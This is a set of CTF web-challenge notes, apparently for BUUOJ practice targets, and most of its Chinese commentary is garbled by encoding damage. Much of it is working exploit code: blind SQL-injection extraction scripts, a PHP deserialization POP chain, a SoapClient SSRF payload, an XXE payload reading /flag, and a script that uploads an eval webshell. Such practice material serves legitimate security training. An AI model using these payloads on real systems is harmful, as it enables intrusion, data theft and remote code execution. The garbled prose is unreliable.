[HFCTF2020]JustEscape
WP
vm2ɳºÐÌÓÒÝ
Éæ¼°µ½nodejs²»»á
[Íø¶¦±2018]Unfinish
½Å±¾
import requests
from bs4 import BeautifulSoup
import time
url = 'http://f8933a3b-5f22-4bde-bde9-7a49c4b1f0a4.node4.buuoj.cn:81/'
m = ''
for i in range(100):
payload = "0'+ascii(substr((select * from flag) from {} for 1))+'0".format(i+1)
register = {'email':'abc{}@qq.com'.format(i),'username':payload,'password':'123456'}
login = {'email':'abc{}@qq.com'.format(i),'password':'123456'}
req = requests.session()
r1 = req.post(url+'register.php',data = register)
r2 = req.post(url+'login.php', data = login)
r3 = req.post(url+'index.php')
html = r3.text
soup = BeautifulSoup(html,'html.parser')
UserName = soup.span.string.strip()
if int(UserName) == 0:
break
m += chr(int(UserName))
print(m)
time.sleep(1)
[MRCTF2020]Ezaudit
¿¼µãÊÇmt_randµÄÖÖ×Ó,αËæ»ú,ºÍ֮ǰµÄÒ»¸öαËæ»úÌâÄ¿×ö·¨Ò»Ä£Ò»Ñù
×ܽá:
ÏȼÆËãÖÖ×Ó:
str1='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
str2='KVQP0LdJKRaV3n9D'
str3 = str1[::-1]
length = len(str2)
res=''
for i in range(len(str2)):
for j in range(len(str1)):
if str2[i] == str1[j]:
res+=str(j)+' '+str(j)+' '+'0'+' '+str(len(str1)-1)+' '
break
print(res)
ÅäºÏphp_mt_seedÀ´½«ÖÖ×Ó±¬ÆƳöÀ´
ÔÙ¼ÆËã˽Կ:
<?php
mt_srand(1775196155);
function public_key($length = 16) {
$strings1 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
$public_key = '';
for ( $i = 0; $i < $length; $i++ )
$public_key .= substr($strings1, mt_rand(0, strlen($strings1) - 1), 1);
return $public_key;
}
function private_key($length = 12) {
$strings2 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
$private_key = '';
for ( $i = 0; $i < $length; $i++ )
$private_key .= substr($strings2, mt_rand(0, strlen($strings2) - 1), 1);
return $private_key;
}
echo "ÕâÊǹ«Ô¿:".public_key()."</br>";
echo "ÕâÊÇ˽Կ:".private_key()."</br>";
?>
[Ç¿Íø± 2019]Upload
Ò»ÌõÁ´×Ó,¼òµ¥¿´ÁËÒ»ÏÂÍøÉϵÄwp¸Ð¾õÉÙµã
Ê×ÏÈ:
ÕÒµ½Õâ¸öÎļþÉÏ´«¼ì²â,»òÕßÓëÕâ¸öÎļþÉÏ´«ÓйصĵãÒ²¾ÍÊÇProfileÕâ¸ö×ÓÀà,ÒÔ¼°»¹»áÈÏΪÕâÊÇ·´ÐòÁл¯µÄÌâÄ¿ÊÇÔÚÕâÀï:
¸ú×ÙÕâ¸öº¯Êý:
public function login_check(){
$profile=cookie('user');
if(!empty($profile)){
$this->profile=unserialize(base64_decode($profile));
$this->profile_db=db('user')->where("ID",intval($this->profile['ID']))->find();
if(array_diff($this->profile_db,$this->profile)==null){
return 1;
}else{
return 0;
}
}
}
ͬʱÔÚ´ËphpÎļþÖпÉÒÔÀûÓÃconstructÀ´¸øÆ丳ֵΪ0Ö±½Ó²»¾¹ý´ËifµÄÅжÏ
Ëû»á°ÑÄãcookieÖеÄuserµÄÖµÏÈbase64½âÂëÈ»ºó·´ÐòÁл¯,ÆäÖе¼Ö³öÏÖ©¶´µÄ´úÂëÊÇ
if($this->ext) {
if(getimagesize($this->filename_tmp)) {
@copy($this->filename_tmp, $this->filename);
@unlink($this->filename_tmp);
$this->img="../upload/$this->upload_menu/$this->filename";
$this->update_img();
}else{
$this->error('Forbidden type!', url('../index'));
}
}else{
$this->error('Unknow file type!', url('../index'));
}
}
ÕâÊÇËûµÄÎļþÉÏ´«µÄÌØÉ«,Êǽ«ÎļþÖØÃûÃû,µ¼ÖºóÆÚÎÒÃÇ¿ÉÒÔ½«jpgÎļþ¸ÄΪphpÎļþ
ÄÇôÏÂÃæ¾ÍÊÇÈçºÎµ÷ÓÃÕâ¸öupload_imgÕâ¸öº¯ÊýÁË,ÔÚ±¾Ò³µÄĩβÓÐÁ½¸öħÊõ·½·¨:
public function __get($name)
{
return $this->except[$name];
}
public function __call($name, $arguments)
{
if($this->{$name}){
$this->{$this->{$name}}($arguments);
}
}
ÓÐÕâÁ½¸ö·½·¨µÄ´æÔÚÄÇôµ÷Óñ¾Ò³µÄº¯Êý¾Í²»³ÉÎÊÌâ,ÔÙ¼ÌÐøÑ°ÕÒÄÜ´¥·¢¸ÃÒ³ÃæµÄcall·½·¨µÄ·½·¨,ÐèÒªÔÚͬһ¸öÃüÃû¿Õ¼äÀïÃæ,ËùÒԺܿì¾ÍÕÒµ½ÁË:
public function __destruct()
{
if(!$this->registed){
$this->checker->index();
}
}
exp:
<?php
namespace app\web\controller;
use think\Controller;
class Profile{
public $checker = 0;
public $filename_tmp = '../public/upload/fb7714fd023d486ddc9939267763bc21/a4a2c22c85451e94294fac2ec87c48c2.png';
public $filename = '../public/upload/fb7714fd023d486ddc9939267763bc21/yn8rt.php';
public $ext = 1;
public $except = array('index' => 'upload_img');
}
class Register{
public $checker;
public $registed;
public function __construct()
{
$this->checker=new Profile();
}
}
$o = new Register();
echo base64_encode(serialize($o))
?>
[GYCTF2020]Easyphp
https://johnfrod.top/ctf/gyctf2020easyphp/
[GXYCTF2019]StrongestMind
from requests import *
import re
import time
s = session()
a = s.get("http://f7ec9408-bbeb-4a20-9e38-e4d90de04744.node4.buuoj.cn:81/")
pattern = re.findall(r'\d+.[+-].\d+', a.text)
c = eval(pattern[0])
a = s.post("http://f7ec9408-bbeb-4a20-9e38-e4d90de04744.node4.buuoj.cn:81/index.php", data = {"answer" : c})
for i in range(1005):
try:
pattern = re.findall(r'\d+.[+-].\d+', a.text)
c = eval(pattern[0])
print(c)
a = s.post("http://f7ec9408-bbeb-4a20-9e38-e4d90de04744.node4.buuoj.cn:81/index.php", data = {"answer" : c})
time.sleep(0.5)
print(i)
except:
pass
print(a.text)
[SCTF2019]Flag Shop
https://www.freesion.com/article/9299639089/
[SUCTF 2018]GetShell
ÀûÓÃÈ¡·´Ð´Ä¾ÂíÀ´ÊµÏÖÈƹý
WP
bestphp¡¯s revenge
ÀûÓÃsoapclientÀ´ÊµÏÖssrf
<?php
$target = "http://127.0.0.1/flag.php";
$attack = new SoapClient(null,array('location' => $target,
'user_agent' => "yn8rt\r\nCookie: PHPSESSID=l6ne21akbgdv48jff5h53go5i6\r\n",
'uri' => "123"));
$payload = urlencode(serialize($attack));
echo $payload;
?>
?name=|O%3A10%3A%22SoapClient%22%3A4%3A%7Bs%3A3%3A%22uri%22%3Bs%3A3%3A%22123%22%3Bs%3A8%3A%22location%22%3Bs%3A25%3A%22http%3A%2F%2F127.0.0.1%2Fflag.php%22%3Bs%3A11%3A%22_user_agent%22%3Bs%3A53%3A%22yn8rt%0D%0ACookie%3A+PHPSESSID%3Dl6ne21akbgdv48jff5h53go5i6%0D%0A%22%3Bs%3A13%3A%22_soap_version%22%3Bi%3A1%3B%7D&f=session_start
serialize_handler=php_serialize
?f=extract
b=call_user_func
[b01lers2020]Life on Mars
û¿´Ã÷°×
[°²ä± 2019]²»ÊÇÎļþÉÏ´«
strrchr() º¯Êý:²éÕÒ×Ö·û´®ÔÚÁíÒ»¸ö×Ö·û´®ÖÐ×îºóÒ»´Î³öÏÖµÄλÖÃ,²¢·µ»Ø´Ó¸ÃλÖõ½×Ö·û´®½áβµÄËùÓÐ×Ö·û¡£
WP
[ISITDTU 2019]EasyPHP
WP
ÀûÓÃÒì»òÔÙÒì»òÈƹý×Ö·ûÊýÏÞÖÆ
[GYCTF2020]Ez_Express
ѧϰJavaScriptÕâһƪ¾Í¹»ÁË
JSÔÐÍÁ´ÎÛȾ³õ̽
¾ßÌå²Î¿¼pʦ¸µµÄÎÄÕ ³õ̽JavaScriptÔÐÍÁ´ÎÛȾ
WP1
ÔÐÍÁ´ÎÛȾ
[RoarCTF 2019]Online Proxy
x-forwarded-for×¢Èë
¶þ´Î×¢Èë
äע
WP
[CSAWQual 2019]Web_Unagi
xxeµÄÈƹý
<?xml version='1.0'?>
<!DOCTYPE users [
<!ENTITY xxe SYSTEM "file:///flag" >]>
<users>
<user>
<username>bob</username>
<password>passwd2</password>
<name> Bob</name>
<email>bob@fakesite.com</email>
<group>CSAW2019</group>
<intro>&xxe;</intro>
</user>
</users>
[HarekazeCTF2019]Avatar Uploader 1
WP
[GKCTF 2021]easycms
ÈÎÒâÎļþÏÂÔØ©¶´
WP
[BSidesCF 2019]SVGMagic
xxe©¶´
WP
[EIS 2019]EzPOP
WP
[N1CTF 2018]eating_cms
WP
[SWPU2019]Web4
WP
[FireshellCTF2020]Caas
WP
[¼«¿Í´óÌôÕ½ 2020]Roamphp1-Welcome
WP
[GXYCTF2019]BabysqliV3.0
<?php
error_reporting(0);
class Uploader{
public $Filename;
public $cmd;
public $token;
function __construct(){
$sandbox = getcwd()."/uploads/".md5($_SESSION['user'])."/";
$ext = ".txt";
@mkdir($sandbox, 0777, true);
if(isset($_GET['name']) and !preg_match("/data:\/\/ | filter:\/\/ | php:\/\/ | \./i", $_GET['name'])){
$this->Filename = $_GET['name'];
}
else{
$this->Filename = $sandbox.$_SESSION['user'].$ext;
}
$this->cmd = "echo '<br><br>Master, I want to study rizhan!<br><br>';";
$this->token = $_SESSION['user'];
}
function upload($file){
global $sandbox;
global $ext;
if(preg_match("[^a-z0-9]", $this->Filename)){
$this->cmd = "die('illegal filename!');";
}
else{
if($file['size'] > 1024){
$this->cmd = "die('you are too big (a€2a¨C?`?€?)');";
}
else{
$this->cmd = "move_uploaded_file('".$file['tmp_name']."', '" . $this->Filename . "');";
}
}
}
function __toString(){
global $sandbox;
global $ext;
return $this->Filename;
}
function __destruct(){
if($this->token != $_SESSION['user']){
$this->cmd = "die('check token falied!');";
}
eval($this->cmd);
}
}
if(isset($_FILES['file'])) {
$uploader = new Uploader();
$uploader->upload($_FILES["file"]);
if(@file_get_contents($uploader)){
echo "???¨¦?¡é??¡¥?? ????? ????¨C???????<br>".$uploader."<br>";
echo file_get_contents($uploader);
}
}
?>
[Black Watch ÈëȺÌâ]Web
Òì»ò½Å±¾
import requests
flag=''
payload1 = '1^(ascii(substr((select(database())),{},1))>{})^1'
payload2 = '1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=\'news\')),{},1))>{})^1'
payload3 = '1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name=\'contents\')),{},1))>{})^1'
payload4 = '1^(ascii(substr((select(group_concat(username))from(admin)),{},1))>{})^1'
for i in range(1,100):
low =28
high =137
mid = (low + high) // 2
while(low < high):
url = 'http://1f8818ec-5797-4bee-b46f-9ec71dac112a.node4.buuoj.cn:81/backend/content_detail.php?id='
payload = payload4.format(i,mid)
url+=payload
r = requests.get(url)
text = str(r.json())
if "Ôýʦ¸µÈ±¸öÅ®ÅóÓÑ" in text:
low = mid + 1
else:
high = mid
mid = (low + high) // 2
if(chr(mid)==''):
break
flag +=chr(mid)
print(flag)
print(flag)
[SUCTF 2018]MultiSQL
WP
Ê®½øÖÆÈƹý¹ýÂËдÂí
[RoarCTF 2019]Simple Upload
import requests
'''·½·¨¶þ'''
url = "http://f98099c2-262f-472c-8002-393f7a2b62fd.node4.buuoj.cn:81/index.php/home/index/upload/"
s = requests.Session()
files = {"file": ("shell.<>php", "<?php eval($_GET['cmd'])?>")}
r = requests.post(url, files=files)
print(r.text)
[CISCN2019 »ª¶«ÄÏÈüÇø]Web4
wp
flask-session-managerʹÓÃ
[SUCTF 2018]annonymous
wp
import requests
for i in range(100):
url = "http://4b101e75-e297-4884-98f3-52bd2aa1e4d9.node4.buuoj.cn:81/?func_name=%00lambda_{}".format(i)
res = requests.get(url)
if "flag" in res.text:
print(res.text)
break
else:
print('loading....')
[GoogleCTF2019 Quals]Bnv
WP
|